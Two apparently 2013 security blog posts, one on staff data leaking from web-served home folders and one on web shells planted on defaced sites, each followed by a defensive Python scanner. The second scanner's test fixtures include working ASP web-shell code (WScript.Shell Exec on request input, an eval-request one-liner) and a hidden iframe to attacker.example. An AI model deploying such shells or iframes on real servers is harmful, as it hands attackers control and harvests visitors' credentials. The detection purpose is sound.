
Monday 11 February 2013

Sensitive data in personal home folders found thanks to Google!


Many people keep a mailing list: a quick way to reach a group of colleagues when certain events happen. Such a list is mostly kept for personal convenience, and for that same reason it ends up on a personal share on the network, better known as your personal home folder. So far nothing wrong.

But what happens if these personal home folders are browsable from the internet?
From that moment on, we have a data leak.

This is a situation I bumped into with a Belgian governmental organisation, which I will not mention by name as they are very cooperative in getting the problem fixed. The information I read via a cached Google page was a data leak of a similar kind to the one I found earlier this year with "dghr.mil.be": names, location, phone, job title, email, etc. Nothing special, you would think, but still useful information for identity theft and surely a good case for the Belgian Privacy Commission.

But who is to blame?

Looking at the information published on the site, the purpose of the server seems to be presenting the staff: staff members can publish an introduction about themselves and, if allowed, their academic work.
So the sysadmin could claim that it was the user's mistake to publish internal data there.
But the URL follows the common format for personal home folders, http://<server>/~<username>, which web servers such as Apache (mod_userdir) use to serve a directory straight out of each user's home; everything placed in that directory is published with it.
So maybe the user was not aware that his private folder was open to the public.

What can we learn from this? And what did we propose to the organisation involved?
  1. Make clear guidelines about which locations on the network are made public.
  2. Disable directory browsing, so that Google and casual visitors cannot walk through a folder and harvest files that may hold sensitive data.
  3. Perform audits regularly. This can be automated: screen the published content and raise an alarm to the owner only, who can then decide whether there is a security violation.
Security is only as strong as its weakest link.
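As an added example of points 2 and 3 (my code, not part of the original post and not the tooling the organisation uses), the Python script below implements both checks: it recognises an auto-generated directory listing, and it screens published text files for e-mail addresses, phone numbers and a "confidential" marker, grouping the findings per user so the alarm goes to the folder owner. It assumes the usual Apache mod_userdir layout /home/<user>/public_html; the user names, the mailing-list CSV, the cached listing page and the Belgian phone-number formats are constructed assumptions for the demonstration.

```python
"""Audit of home folders served via http://<server>/~<user>/ (added example).

Two checks a sysadmin can schedule:
  1. is_directory_listing(): does a fetched page look like an auto-generated
     directory index (so a search engine can crawl every file in the folder)?
  2. scan_files() / scan_tree(): does the published content contain e-mail
     addresses, phone numbers or a "confidential" marker?

Findings are grouped per user so that the alarm goes to the owner of the
folder, who decides whether it is a real violation; the audit never deletes
anything. The sample data at the bottom is constructed for this demonstration.
"""
import os
import re
from collections import defaultdict

# Apache mod_autoindex pages carry an "Index of /..." title and a parent-directory link.
AUTOINDEX_MARKERS = (
    re.compile(r"<title>\s*Index of /", re.I),
    re.compile(r'href="\.\.?/?"|Parent Directory', re.I),
)

# Patterns that suggest personal or internal data (assumption: Belgian phone formats).
PII_PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "phone": re.compile(r"(?:\+32|\b0)[\s./-]?\d(?:[\s./-]?\d){7,8}\b"),
    "confidential": re.compile(r"\b(?:confidential|vertrouwelijk|internal use only)\b", re.I),
}

# Only plain-text formats are inspected; office and PDF files would need a converter first.
TEXT_EXTENSIONS = {".txt", ".csv", ".html", ".htm", ".xml", ".json"}


def is_directory_listing(html: str) -> bool:
    """True when the page body looks like an auto-generated directory index."""
    return all(marker.search(html) for marker in AUTOINDEX_MARKERS)


def scan_text(text: str) -> dict:
    """Count matches per PII pattern in one file; an empty dict means nothing found."""
    hits = {}
    for name, pattern in PII_PATTERNS.items():
        count = len(pattern.findall(text))
        if count:
            hits[name] = count
    return hits


def scan_files(files: dict) -> dict:
    """files maps '<user>/public_html/<path>' -> text. Returns {user: {path: hits}}."""
    findings = defaultdict(dict)
    for rel_path, text in files.items():
        user = rel_path.split("/", 1)[0]
        hits = scan_text(text)
        if hits:
            findings[user][rel_path] = hits
    return dict(findings)


def scan_tree(home_root: str, public_dir: str = "public_html") -> dict:
    """Read every text file under <home_root>/<user>/<public_dir> and scan it."""
    files = {}
    for user in sorted(os.listdir(home_root)):
        public = os.path.join(home_root, user, public_dir)
        if not os.path.isdir(public):
            continue
        for dirpath, _, names in os.walk(public):
            for name in names:
                if os.path.splitext(name)[1].lower() not in TEXT_EXTENSIONS:
                    continue
                full = os.path.join(dirpath, name)
                try:
                    with open(full, encoding="utf-8", errors="replace") as fh:
                        files[os.path.relpath(full, home_root).replace(os.sep, "/")] = fh.read()
                except OSError:
                    continue  # unreadable file: skip it, the owner controls permissions
    return scan_files(files)


def format_alerts(findings: dict) -> list:
    """One line per flagged file, addressed to the folder owner."""
    lines = []
    for user in sorted(findings):
        for path, hits in sorted(findings[user].items()):
            summary = ", ".join(f"{name}={count}" for name, count in sorted(hits.items()))
            lines.append(f"{user}: {path} is public and contains {summary}")
    return lines


# Constructed sample: two staff home folders and one cached listing page.
SAMPLE_FILES = {
    "alice/public_html/index.html": "<h1>Alice Example</h1><p>Research on formal methods.</p>",
    "alice/public_html/mailinglist.csv": (
        "name,phone,email,title\n"
        "Bob Peeters,+32 2 123 45 67,bob.peeters@example.gov,Adviser\n"
        "An Claes,0475 12 34 56,an.claes@example.gov,Clerk\n"
    ),
    "carol/public_html/notes.txt": "Internal use only: contact list for the crisis team.",
}
SAMPLE_LISTING = (
    '<html><head><title>Index of /~alice</title></head><body>'
    '<h1>Index of /~alice</h1><a href="../">Parent Directory</a> '
    '<a href="mailinglist.csv">mailinglist.csv</a></body></html>'
)

if __name__ == "__main__":
    print("directory listing:", is_directory_listing(SAMPLE_LISTING))
    for line in format_alerts(scan_files(SAMPLE_FILES)):
        print(line)
```

On a real server you would run scan_tree("/home") from cron and mail each user only their own lines; a hit is a reason for the owner to look, not an automatic takedown, since the patterns also match harmless things such as a department's public phone number. For point 2 on Apache itself, `Options -Indexes` in the `<Directory>` block that covers the user folders switches off the auto-generated listings, and `UserDir disabled` (re-enabled per person with `UserDir enabled <user>`) stops publishing home folders altogether. Fixing the server does not empty Google's cache: the cached copy stays until Google recrawls the URL or you ask for its removal.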

Tuesday 29 January 2013

Confidentiality dangers of defaced websites using shells

In my previous post I explained how you might abuse the DNN hack to modify or upload files on a vulnerable web server. Many hosts that were reported as infected by Sejeal and HMei7 have still not taken any action, as the evidence is still available. They might want to reconsider their lack of administration.

Once a person is able to upload a file to your web server, he will be able to upload a "shell". Many such shells are freely available on the net, e.g. an ASP shell:

The ASP script aspshell.asp is a simple web application that provides a shell-like environment for administering Microsoft IIS web servers. Commands submitted from a web browser are executed on the web server, and the output is sent back and dumped in the browser window.

This means that whoever can reach this shell is able to manage your complete web server.
He can also insert an iframe into your web page and show a spoofed page to your customers. Perhaps that page asks for personal details, login details, credit card details, ... and besides keeping the information for itself, it also passes the input on to your real web server so nobody gets suspicious.
The scenarios you could build on this idea have no limit.

Sysadmins should monitor their servers and act as soon as possible. Otherwise they are playing with the confidentiality of their customers.
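To make that monitoring concrete, here is an added example in Python (my code, not the author's and not a tool from the post) that scans an IIS web root for the two traces described above: ASP files that behave like aspshell.asp, i.e. they create a shell or filesystem COM object and execute or write something taken from the request (or simply eval the request, the classic one-line shell), and pages with a hidden iframe injected into them. The file names, the host attacker.example and the sample ASP sources are constructed fixtures built to trigger the signatures; it is pattern matching, so it finds known shapes of shells, not every possible one.

```python
"""Scan an IIS web root for traces of an uploaded web shell (added example).

  1. is_suspected_shell(): ASP source that creates WScript.Shell or
     Scripting.FileSystemObject, calls Exec/Run/CreateTextFile/OpenTextFile,
     and reads its input from Request(); or that eval()s the request directly.
  2. hidden_iframes(): iframes sized to zero or hidden with CSS, the usual way
     a spoofed page is shown on top of the real site.

A clean result means "nothing obvious", not proof of integrity.
The sample web root at the bottom is constructed for this demonstration.
"""
import re

ASP_INDICATORS = {
    "shell_object": re.compile(
        r'CreateObject\s*\(\s*"(?:WScript\.Shell|Scripting\.FileSystemObject)"', re.I),
    "exec": re.compile(r"\.(?:Exec|Run|CreateTextFile|OpenTextFile)\s*\(", re.I),
    "request_input": re.compile(r"\bRequest(?:\.Form|\.QueryString)?\s*\(", re.I),
    "eval_request": re.compile(r"\b(?:eval|execute)\s*\(?\s*request\b", re.I),
}

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_ATTR = re.compile(
    r'(?:width|height)\s*=\s*["\']?0(?!\d)|display\s*:\s*none|visibility\s*:\s*hidden', re.I)
SRC_ATTR = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)


def asp_indicators(source: str) -> list:
    """Names of the shell indicators present in one ASP source file."""
    return [name for name, pattern in ASP_INDICATORS.items() if pattern.search(source)]


def is_suspected_shell(source: str) -> bool:
    """A one-line eval shell, or the full object + action + request-input triad."""
    found = set(asp_indicators(source))
    return "eval_request" in found or {"shell_object", "exec", "request_input"} <= found


def hidden_iframes(html: str) -> list:
    """src of every iframe that is sized to zero or hidden by CSS."""
    found = []
    for tag in IFRAME_TAG.findall(html):
        if HIDDEN_ATTR.search(tag):
            src = SRC_ATTR.search(tag)
            found.append(src.group(1) if src else "(no src)")
    return found


def scan_webroot(files: dict) -> dict:
    """files maps relative path -> content. Returns {path: [issue, ...]} for flagged files."""
    report = {}
    for path, content in files.items():
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        issues = []
        if ext in ("asp", "aspx") and is_suspected_shell(content):
            issues.append("suspected web shell: " + ", ".join(asp_indicators(content)))
        if ext in ("html", "htm", "asp", "aspx"):
            issues.extend("hidden iframe -> " + src for src in hidden_iframes(content))
        if issues:
            report[path] = issues
    return report


# Constructed sample web root: one clean page, two shell-like uploads,
# one page with an injected phishing iframe and one with a legitimate embed.
SAMPLE_WEBROOT = {
    "default.asp": '<% Response.Write("Welcome to our shop") %>',
    "images/upload.asp": (
        '<%\n'
        'cmd = Request.QueryString("cmd")\n'
        'Set sh = Server.CreateObject("WScript.Shell")\n'
        'Set ex = sh.Exec("cmd.exe /c " & cmd)\n'
        'Response.Write(ex.StdOut.ReadAll())\n'
        '%>'
    ),
    "cmd.asp": '<%eval request("pass")%>',
    "index.html": (
        '<html><body><h1>Shop</h1>'
        '<iframe src="http://attacker.example/login.html" width="0" height="0" frameborder="0">'
        '</iframe></body></html>'
    ),
    "about.html": (
        '<html><body><iframe src="https://www.youtube.com/embed/abc" '
        'width="560" height="315"></iframe></body></html>'
    ),
}

if __name__ == "__main__":
    for path, issues in scan_webroot(SAMPLE_WEBROOT).items():
        for issue in issues:
            print(f"{path}: {issue}")
```

scan_webroot takes a path-to-content mapping so it can be fed from a walk over the live web root, from a backup, or from a diff against the last known-good deployment. Expect a few legitimate hits (an admin page that reads Request() and writes a log file with FileSystemObject looks the same to the regexes), so treat the report as a triage list; and since a shell gives the attacker the whole server, a confirmed hit means rebuilding from known-good sources and rotating the credentials stored on that host, not just deleting the file.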


NOTE: All this is for educational purposes. I am not responsible for any problems you cause by careless use.